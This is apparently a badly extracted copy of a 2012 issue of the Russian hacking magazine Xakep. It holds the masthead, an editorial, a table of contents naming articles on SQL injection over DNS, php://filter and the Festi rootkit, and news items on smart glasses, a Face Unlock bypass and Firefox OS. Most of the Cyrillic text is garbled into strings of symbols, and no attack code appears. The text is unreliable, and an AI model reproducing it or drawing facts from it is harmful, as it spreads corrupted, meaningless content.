!"#$%$&'(&$)* LINUX %$ "*$+#,-%)

!"#$%"&'$()&&)* !"#$: 230 %.

& ' ( # $ ) * + , * - . / 0 + " ( # 1 2 2 ' ) 3 4$ # * 5

WWW.XAKEP.RU

09 (164) 2012 6$4$ * #$7"&#12 .$(*)82

032

!"#$% &$'()* +&,-,-)+,. Apple

#)# +$,')()-)+.

PARALLELS?

SQL-/&0"#1//2"!", DNS

6 3-)(&45 #&/3$ #$'/&3"

026

066

094

&")"9#1:7'(;)$4!"! #$!%& '()#*+,-.* # &//&%&.0,+ ,1!-/!$!0** 123* ,14!5.,+ 6&0.&)*7. -!8,90( :., %!&3;0,-.;

020

Ñæëìáíá

!"#$%&'(!"#$%&' ()*#+,-( !"#$%& «step» '()*& (step@real.xakep.ru).#/)0,1,)"2 3"#$%-3- ()*#+,-(#4- ,)5%16)0+1/ $-4(-0#/ +&,-#. «Andrushock» /%"0##0 (andrushock@real.xakep.ru)7)8-()*#+,-( '()1 '(#23*"40 (ilembitov@real.xakep.ru)9&4:0+#;<1' ()*#+,-( '()1 56-7#&84 (kurchenko@real.xakep.ru)

=)*#+,-(& (:>(1+PCZONE * UNITS '()1 '(#23*"40 (ilembitov@real.xakep.ru)9:;</ =-*. >4()?#0 (goltsev@real.xakep.ru) UNIXOID * SYN/ACK +&,-#. «Andrushock» /%"0##0 (andrushock@real.xakep.ru)MALWARE * 5<@'A> +(#8B%&,- «Dr. Klouniz» ;4C40B8*. (alexander@real.xakep.ru)?1,)(#,:(%&' ()*#+,-( D0E#&*1 F%-*$40%PR-/)%)*@)( ;G,2*(% 9%E*C40% (vagizova@glc.ru)

DVD9&4:0+#;<1' ()*#+,-( +&"4& «ant» H6840 (ant@real.xakep.ru)Unix-(#A*)" +&,-#. «Andrushock» /%"0##0 (andrushock@real.xakep.ru)Security-(#A*)" @2*"-*. «D1g1» D0,48*240 (evdokimovds@gmail.com)B-%,#@ $1*)- /%8B*2 I-63*?J&

ARTC(,-*1()+,-( +(*8 9%.&#- (alik@glc.ru)D1A#'%)( DE4- K4&42%-#09)(0,#"2<1+ 9#-% !0#"(JL E1"*-()*#+,-( D(#&% M#,&40%F"";0,(#G1H %# ->"-@+) I#234(%" >6E8%#0, !#-E#. 5%"840

PUBLISHINGFA*#,)"2 <<< «>#.2 ;N&,», 119146, E. /4B80%, O-6&C#&B8%1 1-1 6(., ,.5

I#(.: (495)934-7034, P%8B: (495) 545-09-06

!"#$%&' *1A#'%)( Q&,* I#-&36((

!$)*"+",'" !"%-$*.I#(.: (495) 935-7034, P%8B: (495) 545-0906

/0#"- !"%-$*..#/)0,1,)"2 3)%)(#"2%-3- *1()+,-(# 4- 4(-*#@#/ :*&%*,% R#-#,&*7#&84 (zinaidach@glc.ru)D1()+,-( 4- ()+"#/)@:(%#"# «I#+)(» D(#&% K4(*8%-$40% (polikarpova@glc.ru)J,#(K1' /)%)*@)( +&%B"%B*1 !484(40B8%1 (sokolovskaya@glc.ru)B)%)*@)(& @2*"-*. 5%76-*& (kachurin@glc.ru) A*84(%. +-#P)#0 (arefyev@glc.ru)D1()+,-( 3(:44& TECHNOLOGY /%-*&% O*(%"40% (filatova@glc.ru)D1()+,-( 3(:44& CORPORATE 5-*B"*&% I%"%-#&840% (tatarenkova@glc.ru)D1()+,-( 3(:44& LIFESTYLE +(*B% !JB4#0% (sysoeva@glc.ru)J,#(K1' ,(#81+-/)%)*@)( /%-)1 M6(%&40% (bulanova@glc.ru)

/0#"- !"$-')$&'' 12"&2!/"%0/3D1()+,-( +(#8B%&,- 54-#&P#(), (korenfeld@glc.ru)

#'10!'45&'(D1()+,-( 4- *10,(1>:G11 I%")1&% 54S#(#0% (kosheleva@glc.ru)

2/#2'1%$=:+-$-*1,)"2 -,*)"# 4-*410+1 '-*&% @4(E%&40% (dolganova@glc.ru)B)%)*@)( 04)G(#04(-0,(#%)%1H A*&% @2*"-G8 (dmitryuk@glc.ru)

L(),)%A11 1 *-4-"%1,)"2%#H 1%8#9 B(67%# 04C&*8&40#&*1 04$-4B40 $4 8%7#B"06 $#7%"* * DVD-,*B840: claim@glc.ru.!-(H6#H "1%1H 4- 4-*410+)<&(%.&-2%E%C*& $4,$*B8*: http://shop.glc.ruO%8B ,(1 4"$-%08* 86$4&40 * 80*"%&?*. &% &40J# $4,$*B8*: (495) 545-09-06I#(#P4& 4",#(% $4,$*B8* ,(1 T*"#(#. /4B80J: (495) 663-82-77I#(#P4& ,(1 T*"#(#. -#E*4&40 * ,(1 C04&840 B 243*()&JL "#(#P4&40: 8-800-200-3-999D"H 410)/: 101000, /4B80%, >(%0$47"%2", %/1 652, U%8#-

M6()*1,)"2: <<< «9-63(#0B8*. /#,*%», 125367, E. /4B80%, 9-%7#3&J. $-4#C,, ,. 10, 4P*B 1:%-#E*B"-*-40%&4 0 /*&*B"#-B"0# V4BB*.B84. O#,#-%?** $4 ,#(%2 $#7%"*, "#(#-%,*40#W%&*G * B-#,B"0%2 2%BB40JL 84226&*8%?*. K' X O!77-50451 4" 04 *G(1 2012 E4,%.

<"$#7%"%&4 0 "*$4E-%P** Scanweb, O*&(1&,*1. I*-%T 222 100 N8C#2$(1-40.

/&#&*# -#,%8?** &# 431C%"#()&4 B40$%,%#" B 2&#&*#2 %0"4-40. 9B# 2%"#-*%(J 0 &42#-# $-#,4B"%0(1G"B1 8%8 *&P4-2%?*1 8 -%C2JS(#&*G. ;*?%, *B$4()C6GW*# ,%&&6G *&P4-2%?*G 0 $-4"*04C%84&&JL ?#(1L, 24E6" 3J") $-*0(#7#&J 8 4"0#"B"0#&&4B"*. V#,%8?*1 &# &#B#" 4"0#"-B"0#&&4B"* C% B4,#-T%&*# -#8(%2&JL 43Y10(#&*. 0 &42#-#. :% $#-#$#7%"86 &%S*L 2%"#-*%(40 3#C B$-4B% — $-#B(#,6#2.

K4 04$-4B%2 (*?#&C*-40%&*1 * $4(67#&*1 $-%0 &% *B$4()C40%&*# -#,%8?*4&&JL 2%"#-*%(40 T6-&%(% 43-%W%."#B) $4 %,-#B6: content@glc.ru.

© <<< «>#.2 ;N&,», VO, 2012

KV< <F'M5' 54E,% B24"-*S) &% "%8*# 842$%&**, 8%8 Parallels, 8%T#"-B1, 7"4 6 &*L 0B#E,% 0B# 3J(4 L4-4S4. !(4T&4 $-#,B"%0*"), 7"4 0 *L T*C&* 3J(* &#6,%7*, 84E,% C%$6W#&&J. $-4,68" &# 0J-B"-#(*0%(, * B(4T&#.S*# $#-*4,J, 84E,% ,#&#E &# L0%"%(4 ,%T# &% C%-$(%"6 B4"-6,&*8%2. <,6-2%&#&&J. *B"4-*#. B84-4B$#(JL B"%-"%$40, 4S*347&4 $-#,B"%0(1#S) B#3# *,#%(*C*-40%&&6G 8%-"*&86 "4E4, 8%8 &#34()S%1 B4P"0#-&%1 P*-2% 3#B$-#$1"B"0#&-&4 $-#0-%W%#"B1 04 0B#2*-&4 *C0#B"&6G 842$%&*G B 2&4E42*(-(*4&&J2* 434-4"%2*... ' "4()84 84E,% $4E404-*S) B 7#(40#842, 84"4-J. B"41( 6 *B"4840 *, 34(## "4E4, 0B#E,% 4"0#7%( C% -%C-%34"-86, $4&*2%#S), &%B84()84 &% B%242 ,#(# B(4T#& $6") 8 6B$#L6.

Z ,4 B*L $4- $4, B*()&J2 0$#7%"(#&*#2 4" -%CE404-% B4 !"%&*B(%042 K-4"%B40J2, B44B&40%"#(#2 Parallels. [ &#E4 2J 0C1(* *&"#-0)G ,(1 N"4E4 &42#-%. 5%T#"B1, #W# &*8"4 "%8 $-4&*8&40#&&4 * 7#B"&4 &# -%BB8%CJ0%( 4 B(4T&4B"1L, B 84"4--J2* $-*S(4B) B"4(8&6")B1 04 0-#21 B"%&40(#&*1 842$%&**, * B,#(%&&JL 4S*38%L. 9 "%8*# 242#&"J L47#"B1 $4E(4W%") 8%T-,4# B8%C%&&4# B(404: $4&*2%#S), 7"4 N"4 &%B"41W*. 8(%,#C) C&%&*. ,(1 0B#L, 8"4 B4C,%#" &40J# $-4,68"J. M4()S*&B"04 success stories 6B$#S&JL 842$%&*., $4 B6"*, &# 34(## 7#2 *&-"#-#B&4# 7"*04. !%24# T# $4(#C&4# — %&%(*C 4S*348 * 84&-8-#"&J# -#842#&,%?**, 8%8 *L *C3#T%"), 4" (G,#., 84"4-J# C&%842J B N"*2 &# $4&%B(JS8#.

16789: «Step» ';<=:, >;9?@7A. B

twitter.com/stepah

Content004 MEGANEWS !"# $%&%# '( )%"*#+$,- .#"/0011 hacker tweets 1(2-"0#$( & 3&,33#4#

016 !"#"$%& '()*+ ,#-.$& 54% 3%, 2(2 / Excel c ),3%$%. )%+467,*017 Proof-of-concept 8.%34,. IP-(+4#"( )%*9'%&(3#*#- Skype

HEADER/"00.10%.1 2&%34 «50%4+#» App Store. 6.##."$+ *"#-7"5&(3#31 *"#89.#. 5"7:";$"0(- <30*#&($" =3#&(- *"%8*%. 5$8(4. *4.#";3$.1.

015

>3#37$+1 =84?#&@:%&;- &,3%2 4('&,3,/ <2")*%-3%&

639(&A( #. &$=4".=+ "< B#3%(4"*.$@5.$&2?="3($(&*,&(#. Linux-+,"34,>63,& $( 3#*#-?%$ , )*($@#3 )%+ 6)4(&*#$,#. Android

'(&$.0#&5 C4"(&0"5A$3#4&9B " "%%"$%&(3#*#. , C*(&%- 4('4(>%32, 2%.)($,, Parallels

020COVERSTORY

032COVERSTORY

026COVERSTORY

PCZONE032 !"#$#$%&' #$ Apple !"#$%&#'()*, & *+,-./-0 "-12#/33 4#$4#+-(#,3 /' (-,5"- iPhone, iMac 3 iPad!044 (%)*+ , -#*.#/% Windows 6274'08% 8,* cmd.exe 3 #,5('4/#(3&%048 0*1-#2+.3. 4$# Markdown 9)2-,5$:'1 ;#"'4)"30 *$%" 4#$1'("3 8,* )#1%; 4#$/%; $#8#.

!"#$%052 Easy Hack <#"'4)"3' )'"4'(% 24-)(%; &'='0057 5161 # -"%&$#.$#7-%8 &1"#/38 >.31)* /# .:?3; -@3+"#; 3 $#=3=#'1 2#4-,3 -( +4:(A-4)#062 9:)#" ;-.&/#7$#, 6/#,3$ )&'?'/5"3; :*$&31-)('0066 SQL-%*<=->%% ?="=) DNS B-,:.#'1 )-8'4?31-' +#$% 8#//%; .'4'$ DNS070 @A#,%$13 #:="$-1, %/% #&1.*'7 php://filter 9)2-,5$-&#/3' &4#22'4# php://filter & "-/('")(' #(#"3 /# &'+-243,-?'/3*076 PHDays 2012: -1- ;$# :'/#? !(.'( - "-/A'4'/C33 2- 24#"(3.')"-0 +'$-2#)/-)(3 & "#4(3/"#;080 X-Tools 7 :(3,3( 8,* 3)),'8-&#(','0 +'$-2#)/-)(3

MALWARE082 Festi: )/#:*'7 % :=.$=/=.*'7 D#)"#2%&#'1 &/:(4'//-)(3 4:("3(#, /' $4* 24-$&#//-7- «E-4-,'1 )2#1#»086 KIS 2013: *#,13 ,=".%3 !+$-4 )&'?'0 &'4)33 «E#)2'4)"-7-»088 !#7217 2=*3, =./% .2#B=C+ ][-"-/C'2(: )"4%&#'1 A#0,% 2--/-&-1:

&$'()*091 01A1?% *1 .#:=.=A#,1*%38 B-8+-4"# 3/('4')/%; $#8#/30, "-(-4%' 8#F( /# )-+')'8-&#/3*;094 6 6/1,*'8 # -#A%*6= 9; 8-,?'/ 24-.3(#(5 "#?8%0, "(- ).3(#'( )'+* 24-74#113)(-1!098 Face of Windows Phone B4-74#1134-&#/3' 3/('4A'0)-& 8,* WP7.5 & 7-(-&%; 4'C'2(#;

+&+',%(-104 D-#/1 Highload. E"#- F 3 G#)@(#+34-&#/3' +H"'/8#

UNIXOID110 G*1$#2%3 .$"=-#)' !+$-4 ",F.'&%; -)-+'//-)('0 -2'4#C3-//-0 )3)('1% DragonFly BSD114 5-"'$'= "=)=",' I#8'0)(&:'1 )-&4'1'//%' &38'-"#4(% /# 2-,/:F "#(:@":

SYN/ACK120 H1),="*I$+ % *1.$"#%$+ D'@'/3* Acronis 8,* #&(-1#(3$#C33 :)(#/-&"3 !J /# 1/-?')(&- "-125F('4-&124 J"#)#,'= #:/1-1 Open Source 4'@'/3* 8,* -47#/3$#C33 SAAS/IAAS, )2-)-+/%' 3$1'/3(5 3/A-41#C3-//%' (';/-,-733 3 (-, "#" 1% 3; &-)243/31#'1130 KI)*%>1 .$"=..-$=.$#, Tsung: 4#)24'8','//#* )3)('1# /#74:$-./-7- (')(34-&#/3* &'+-243,-?'/30

FERRUM136 L=/%-#= -%$17.-#= &"#%),#A.$,# E:,5(:4/%' 3),,'8-&#/3* +4#()"-7- E3(#* & 2-,5$: 3$&')(/-7- ?:4/#,# «<#"'4»139 BUFFALO Terastation TS5400D NAS'% & 1#))%

.)(/0140 FAQ K-24-)% 3 -(&'(%143 M%.-# 8,5 L+ &)*"-0 &)*.3/%144 WWW2 >8-+/%' web-)'4&3)%

048

!"#$%&'(). *+% Markdown

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

,(-%.'/01& 2#$13($45 )/6$ 3#/&1+$4 7.) (#&62 3#/"62 /#7#8

===========================================================

9.#" "# :.4;#5<41 10 &4"0+:

1. =#/%:3#+'() ( (4"+#$(4(%& Markdown.

2. >(+#"%?4+' -.#@4" 7.) +1$(+%?%@% 317#$+%3#.

3. !#&0+4+' :.%@ ( -%&%A'B Octopress, /#2%(+4? 1@% "# Github.

082

!"#$% 09 /164/ 2012004

!"# #$%&'()#, $*# &+"%( ,- #$.-/' Google Project Glass &+.#0% 1#*2)3*+2 ' (034'% 1#5#6'% 10#%.*!, )# /! )% (3/-"', $*# 7*# 10#',#8(%* *-. +.#0#. 9#/1-)'2 Olympus

,-)'/-%*+2 0-,0-:#*.#8 ('+1"%%&, 10'4#()!5 ("2 )#;%)'2, + 10#-;"#4# 4#(- ' (-6% 3+1%"- 10#(%/#)+*0'0#&-*< 13:"'.% )%+.#"<.# 10#*#*'1#&. =# *%1%0<, .#4(- Google 36% 10')'/-%* 10%(&-0'-*%"<)!% ,-.-,! )- Google Project Glass, Olympus 0%;'"- )% *%02*< &0%/%)' (-0#/ ' #>'?'-"<)# -)#)+'0#&-"- +&#8 10#(3.* + (#-1#")%))#8 0%-"<)#+*<@ — MEG4.0. A #*"'$'% #* +'+*%/! Google, 10#*#*'1 )#+'/#4# ('+1"%2 #* 21#)+.#4# 10#',&#('*%"2 .0%1'*+2 )- (36.3 #$.#& ' +1#+#:%) &!(-&-*< .-0*').3 + 0-,0%;%)'%/ 320 × 240 1'.+%"%8. B0.#+*< QVGA-',#:0-6%)'2 /#6%* &-0<'0#-&-*<+2 & 10%(%"-5 #* 10 (# 2000 .(//2 (7*#4# &1#")% 5&-*'* ("2 20.#4# ()%&)#4# +&%*-). C-/- +'+*%/- &%+'* #.#"# 30 4 ' +1#+#:)- &,-'/#-(%8+*&#&-*< + /#:'"<)!/' 3+*0#8+*&-/' $%0%, ')*%0>%8+ Bluetooth 2.1. A+*0#%))!8 -.+%"%0#/%*0 1#,&#"2%* 310-&"2*< 3+*0#8+*&#/ (&'6%)'2/' 4#"#&!. D+*0#8+*&# #*#:0-6-%* ')>#0/-?'#))#% 1#"% & #:"-+*' 1%0'>%0'$%+.#4# ,0%)'2, 4(% :3(%* (%/#)+*0'0#&-*<+2 )-&'4-?'#))#% 1#"#6%)'% 1#"<,#&-*%"2 ' (034-2 1#"%,)-2 ')>#0-/-?'2. E-.'/ #:0-,#/, Olympus MEG4.0 &1#")% /#6%* '+1#"<,#&-*<-+2, )-10'/%0, & )-&'4-?'#))!5 ,-(-$-5, 10%(#+*-&"22 +&%(%)'2 # /%+*#1#"#6%)'' &"-(%"<?- + GPS-/#(3"2 & +/-0*>#)%. F +0#.-5 0%"',- ' +*#'/#+*' (%&-8+- 1#.- )'$%4# )% +##:G-%*+2.

-$')-2 + &%0+'' 4.0, & Android 1#2&'"-+< >3).?'2 0-,:"#-.'0#&.' +/-0*>#)- Face Unlock, 10',&-))-2 3&%"'$'*< :%,#1-+)#+*<. D&!, #$%)< :!+*0# &!2+)'"#+<, $*# %% "%4.#

#:/-)3*<: (#+*-*#$)# 1#.-,-*< 3+*0#8+*&3 )% "'?# )-+*#2G%4# &"-(%"<?-, - #:!$)3@ :3/-6)3@ >#*#40->'@ '"' >#*#, &!&%(%))#% )- 7.0-) "@:#4# 3+*0#8+*&-. A10#$%/, Google &+%4(- )-,!&-"- Face Unlock 7.+1%0'/%)*-"<)#8 >3).?'%8, #:"-(-@G%8 )',.'/ 30#&)%/ :%,#1-+)#+*'. F()-.# & Android 4.1 «Jelly Bean» 1#2&'"-+< #*(%"<)# &."@$-%/-2 >3).?'2 Liveness Check, .#*#0-2 *0%:3%*, $*#:! 1#"<,#-&-*%"< /#04)3" &# &0%/2 -3*%)*'>'.-?'', — >#*#40->'2, 1#)2*)#% (%"#, /#04-*< )% 3/%%*. 9-,-"#+< :!, 30#&%)< :%,#1-+)#+*' (#"6%) 1#&!+'*<+2, )# )%*. A!2+)'"#+<, $*# + 1#/#G<@ 40->'$%+.#8 #:0--:#*.' ' +#,(-)'2 10#+*%)<.#8 GIF--)'/-?'' /#6)# :%, #+#:!5 10#-:"%/ #:/-)3*< ' Liveness Check. E-.6% )% +*#'* ,-:!&-*< ' # *#/, $*#, 5#*2 1%0%5'*0'*< +'+*%/3 10' 1#/#G' >#*# +*-"# +"#6)%%, %8 &+% 0-&)# )% +*#'* +"';.#/ 36 (#&%02*<: #)- /#6%* +1#.#8)# #*.0!*< (#+*31 . +/-0*>#)3 $%"#&%.3, .#*#0!8 "';< & #:G'5 $%0*-5 1#5#6 )- &"-(%"<?- 3+*0#8+*&- :). C"#&#/, 1-0#"' ' PIN-.#(! 1#-10%6)%/3 &!4"2(2* )-(%6)%%.

!"#$ %!&!'()((!* +),'-(!./$ !/ OLYMPUS !"#"$%&#'!"# ()( #*"# "#$%+#( ,$-&#.$-'#

0!12$(, 3/! /!"(! /4?

!"#$%&&'# ()#*+ %(,'&'*&'- )%"',. /0,)'-0,(% 1'2'13, 1' ('04*3 5%0'( 6)3 (7895#&33 &% 6+,&%1:%,4 0#7/&1 )%; ( ,)3 *3&/,..

MICROSOFT &%'()%$*$* +'%,- YAMMER, ;%&3*%9$/90+ )%;)%"',7'- 0':3%84&.2 0#)(30'( 7')6')%,3(&'<' 78%00%. =/**% 01#873 — 1,2 *3883%)1% 1'88%)'(.

%"./(0$11"2 3$%4'2 4,"%*+(1" GALAXY S III )-5$* &%(5"3"*642 &%2,( 4 (+'7'"/61(8( 4"9*". >' 7/63,4 Developer Edition (#)039 0*'</, ,'847' )%;-)%"',5373.

MEGANEWS

1

)

APPLE 5(8(3(%'/"46 4 *"93"164#(9 #(,&"1'$9 PROVIEW TECHNOLOGY, 7','-)'- 6)3&%18#?%, 6)%(% &% 08'(' «iPad» ( @3,%#. Apple 7/63, #<' ;% 60 *3883'&'( 1'88%)'(.

3 !(5$ HACKERS ON PLANET EARTH !"#$% 4 1'#(, RAY 6)'1#*'&0,)3)'(%8, 5,' *'?&' &%6#5%,%,4 &% 3D-6)3&,#)# 7895 ', &%-)/5&37'( (1%?# «08'?&.2») 3 /06#A&' #<' 6)3*#&3,4.

&()$5'*$/$, 0$,&'(1"*" &( &%(8%",,'%(3"1': VK CUP, 6)'(#1#&&'<' «B@'&-,%7,#», 0,%8 16-8#,&3- 6)'-<)%**30, 3; @3,%+ C?/ D/. B 7%5#0,(# 6)3;% '& 6'8/538 30 ,.0+5 1'88%)'(.

3;!(5 BLACKBERRY 10 (*#/"5;3"$*42 5( 2013 8(5", 0''"$38% 7'*6%&3+ Research In Motion. E)3-53&% 6)'0,%: ;%1#)?73 ( 6'1<','(7# 6)'<)%**&'<' '"#06#5#&3+.

!'-#&%/!0%1 2# $"%+3, '4!*(450! '$( ()( +#6"# #7#.-%

Ñæëìáíá

!"#$% 09 /164/ 2012

MEGANEWS

006

!" #$ %&'&(& )*+,&#$ ! '"*-."*&/!,0#0 !,+*"'+#0 — -+,0" 1!-'&2-!-/+, *+3'0#"', 1!-+*&/4"*$ / +5'&3&'-+% #*&.0% !-'+* #0'+. 6" 3"'/$2 .&7 /"71-!8 70!,1!!00 &9 5-0:*&!-0 0% 3'0#"*"*08. ;"4& / -&#,

:-& 3"'"7 /)&'&# &3"'+-&'+ -+,&.& 1!-'&2!-/+ :"4&/", 3'"7!-+"- 3'+,-0:"!,0 9") &7"<7$. =+-& !,+*"' 7+"- /&)#&<*&!-> 9$!-'& 3'&/"!-0 3&4*$2 7&!#&-': !'+)1 /07*& !3'8-+**&" &'1<0".

6"7+/*& <1'*+4 Forbs 3&/"7+4 #0'1 & -&#, :-& 3&7&9*$" 7"/+2!$ #&<*& /!-'"-0-> *" -&4>,& / +5'&3&'-+% 0 9&4>*0?+%. @,+)$/+"-!8, '"*-."*&/!,0" !,+*"'$, !3&!&9*$" «/07"->» !,/&)> !-"*$ 0 :"'") &7"<71, 1<" 7+/*& 7&!-13*$ / ,&##"':"!,&2 3'&7+<" / /07" &9$:*$% A1'.&*&/! B 3'0#"'1, ,&#3+*08 American Science & Engineering /$31!,+"- -+,0" A1'.&*$ 3&7 9'"*7&# ZBV (Z Backscatter Van) 0 )+ 3&!4"7*"" /'"#8 3'&7+4+ 9&4"" 500 A1'.&*&/ A"7"'+4>*$# !41<9+# CDE 0 0*&!-'+**$# )+,+):0,+#. F A1'.&*+% ZBV 1!-+*&/4"*& '"*-."*&/!,&" &9&'17&/+*0", ,&-&'&" *+3'+/48"- 31:&, 0)41:"*08 *+ 7'1.0" +/-&#&9040 0 &,'1<+GH0" &9I",-$: 4G7"2, !1#,0, 3&7&)'0-"4>*$" ,&*-"2*"'$ 0 -+, 7+4"". J+,&2 A1'.&* #&<"- 3'&!-& 3'&"%+-> 3& +/-&#&904>*&2 3+',&/,", 0 &3"'+-&' 1/070-, / ,+,0% #+(0*+% "!-> 4G70, ,+,&2 -&/+' *+%&70-!8 /*1-'0 .'1)&/$% A1'. K&,+ *" !&/!"# 8!*& 40(> &7*& — 0#"G- 40 3'+/&&%'+*0-"4>*$" &'.+*$ 3'+/& &!1H"!-/48-> 3&7&9*$" «&9$!,0», 31!-> 7+<" ! 3&#&H>G '"*-."*&/!,0% 41:"2, *" 0#"8 &'7"'+ 0 *" 3&41:+8 *0:>".& !&.4+!08. L&<"- !-+->!8, :-& -+,&" !,+*0'&/+*0" *" 8/48"-!8 &9$!,&#, + )*+:0-, ".& #&<*& 3'0#"*8->, ,+, A&-&+33+'+- 040 /07"&,+#"'1, — 9") &!&9&.& '+)'"("*08.

$ 1<" '+!!,+)$/+40 & 3'&",-" Boot to Gecko (B2G), *+7 ,&-&'$# 1!"'7*& -'178-!8 / Mozilla. 6+-3&#*0#, :-& ,&#3+*08 34+*0'&/+4+ 3'"/'+-0->

7/0<&, Gecko, &9"!3":0/+GH02 '+9&-1 9'+1)"'+ Firefox, / &3"'+?0&**1G !0!-"#1 ! &-,'$-$# 0!%&7*$# ,&7&# 748 -"4"A&*&/ 0 34+*("-&/.

6"7+/*& Mozilla /$31!-04+ 3'"!!-'"40), / ,&-&'&# !&&9H+4&!>, :-& 3'&",- Boot to Gecko 3"'"0#"*&/+* — *&/+8 @C 917"- 3&!-+/48->!8 3&7 1)*+/+"#$# 9'"*7&# Firefox (3'"73&4+.+"-!8, :-& 5-& 7&4<*& /$)/+-> 0*-"'"! 3&4>)&/+-"4"2 , *&/$# !#+'-A&*+#, /$%&78H0# *+ '$*&,). J+,<" / 3'"!!-'"40)" 9$40 '+!,'$-$ *",&-&'$" 3&7'&9*&!-0 &-*&!0-"4>*& .'871H"2 @C.

Firefox OS 9+)0'1"-!8 *+ &-,'$-$% /"9-!-+*7+'-+%, 3'"7&!-+/488 '+)'+9&-:0,+# 3'04&<"*02 &!*&/+**$" *+ HTML5 ,&#3&*"*-$ 748 )+7"2!-/&/+*08 /!"% /&)#&<-*&!-"2 +33+'+-*$% 1!-'&2!-/. Mozilla -'+70?0&**& .+'+*--0'1"- +9!&4G-*1G &-,'$-&!-> 3'&",-+ 0 *")+/0!0#&!-> '+)'+9&-,0 &- ,&##"':"!,0% A0'#. B&#3+*08 *+#"'"*+ 3"'"7+-> 5-+4&**1G '"+40)+?0G Web API, '+)'+9&-+*-*&.& 3'0 !&)7+*00 Firefox OS, / &'.+*0)+?0G W3C 748 1-/"'<7"*08 / ,+:"!-/" /"9-!-+*7+'-+. K'0 5-&# Web API 3& /&)#&<*&!-0 9+)0'1"-!8 *+ 1<" 3'0*8-$% !-+*7+'--+%, 40(> '+!(0'88 0% / *"&9%&70#$% *+3'+/4"*08%. K4+-A&'#+ 0)*+:+4>*& &3-0#0)0'&/+*+ 748 *+:+4>*&.& !".#"*-+ !#+'-A&*&/ 0 40("*+ 0)40(*0% 3'&#"<1-&:*$% 3'&!4&",, :-& 3&)/&40- #&904>*$# &3"'+-&'+# 3&7.&-&-/0-> 3'&71,-$, 3'"7&!-+/48GH0" 9&.+-$2 *+9&' A1*,?02 3& ?"*" 7"("/$% -"4"A&*&/.

M+)/0/+"#+8 / '+#,+% 3'&",-+ Firefox OS #&904>*+8 34+-A&'#+ 9+)0'1"-!8 *+ 07"" 0!3&4>)&/+*08 9'+1)"'*&-.& &,'1<"*08 /#"!-& '+9&:".& !-&4+. F &-40:0" &- Chrome OS, 34+-A&'#+ Firefox OS &'0"*-0'&/+*+ *+ #&904>*$" 1!-'&2!-/+ 0 3'"7&!-+/48"- '+!(0'"**$2 Web API 748 !&)7+*08 !3"?0+40)0'&/+**$% #&904>*$% 3'04&<"*02, / 3&4*&2 #"'" 0!3&4>)1GH0% /&)#&<*&!-0 !&/'"#"**$% -"4"A&*&/. @!*&/&2 !41<0- 87'& Linux 0 *0),&1'&/*"/$" ,&#3&*"*-$ 0) 34+-A&'#$ Android. F#"!-& /0'-1+4>*&2 #+(0*$ Dalvik 748 )+31!,+ 3'04&<"*02 )+7"2!-/&/+* /"9-!-", Mozilla. ;48 '+!3'&!-'+*"*08 &9*&/4"*02 / Firefox OS 9171- 0!3&4>)&/+->!8 3'&/"'"**$" -"%*&4&-.00, 3'0#"*8"#$" 3'&",-&# Firefox 0 ,+-+4&.+ 7&3&4-*"*02 748 Firefox. K'04&<"*08 9171- '+!3'&!-'+*8->!8 :"'") ,+-+4&.-#+.+)0* Mozilla Marketplace, ,&-&'$2 917"- 3&77"'<0/+-> '+!3'&!-'+*"*0" ,+, 9"!34+-*$%, -+, 0 34+-*$% 3'04&<"*02. K&4>)&/+-"4>!,02 0*-"'A"2! 34+-A&'#$ A&'#0'1"-!8 0) *+9&'+ /"9-3'04&<"*02 Gaia. F ".& !&!-+/ /&271- 9'+1)"', ,+4>,148-&', ,+4"*7+'>-34+*0'&/H0,, 3'04&<"*0" 748 '+9&-$ ! /"9-,+#"'&2, +7'"!*+8 ,*0.+, 0*-"'A"2! 748 &!1H"!-/4"*08 -"4"A&*-*$% )/&*,&/, ,40"*- 54",-'&**&2 3&:-$, 0*-"'A"2! 748 SMS/MMS 0 -+, 7+4"". F#"!-& 3'"7&!-+/4"*08 7&!-13+ , '"+4>*&2 A+24&/&2 !0!-"#" 3'&.'+##$ 9171- &.'+*0:"-*$ /*1-'0 /0'-1+4>*&2 NC, 3&!-'&"**&2 ! 0!3&4>)&/+*0-"# IndexedDB API 0 0)&40'&/+**&2 &- &!*&/*&2 !0!-"#$. C&)7+**$" ! 0!3&4>)&/+*0"# Web API 3'&.'+##$ !#&.1- '+9&-+-> *" -&4>,& / &,'1<"*00 Firefox OS, *& 0 / 4G9&# 3&77"'<0/+GH"# !-+*7+'-$ /"9-!-",". K"'/$" #&7"40 !#+'-A&*&/, 1,&#34",-&/+**$% *&/&2 @C, /$31!-8- ,&#-3+*00 TCL Communication Technology (Alcatel) 0 ZTE. C#+'--A&*$ ! Firefox OS 3&!-138- / 3'&7+<1 / *+:+4" 2013 .&7+ 3&7 9'"*7&# Vivo, 3'0*+74"<+H0# ,&#3+*00 Telefonica.

!"#$%"& !'() *+,+) )-!. /(01*"2$ MOZILLA !"#$%&'()*' %+,%&(#--./

+!#"'0)+--./ %)%&#1.

FIREFOX OS. 34- 01"'"

%"&'(%$)(* CHROME +,)-)$ .+/0, 1$.+)&,%(%+2",3 %$#4".)-$ 5"))$%- )" &,+%+))($ &"6,-. !"#$ %&'%()*$.

2

.

(+%21)*#&-)3 4+5'3 &6+,'-) ( &+"7#%&(#--+3 +,%&'-+(8# !+*.9)* %#"&)5)8'& MICROSOFT CERTIFIED TECHNOLOGY SPECIALIST

%'1:3 1+*+$+3 %#"&)5)0)"+('--:3 %!#0)'*)%& MICROSOFT

+(%(, -./.0 1( 2%.3-. 4&%-*14& «2., %(1-#(1», 5-. — %(&$6170 ./%&'(8 34&1&, 4.-.%70 ,($&(- ZBV.

-#+,:9-+# !")1#-#-)# ;-'8+1:6 &#6-+*+<)3

!"#$% 09 /164/ 2012

MEGANEWS

008

&#'(%")*+*, -'.-/"($01 MEGAUPLOAD #*2" )-(#-2" / '3" !"#!$%#% &! '()"( 2013 *!&(. +%' ,!-,)-$.-'/ !0"(-"01 2 3!2!4 5-#(.&%%.

!"#$% &'() * +&,#%% -."/%( 0&#1( !"#!2.31 Microsoft Imagine Cup 2012, "45%4&*/%6" * 74"5 6",2 3*"% ,%3)4&(%4&%. 8)49 ,#%: 342,%#4; 3"

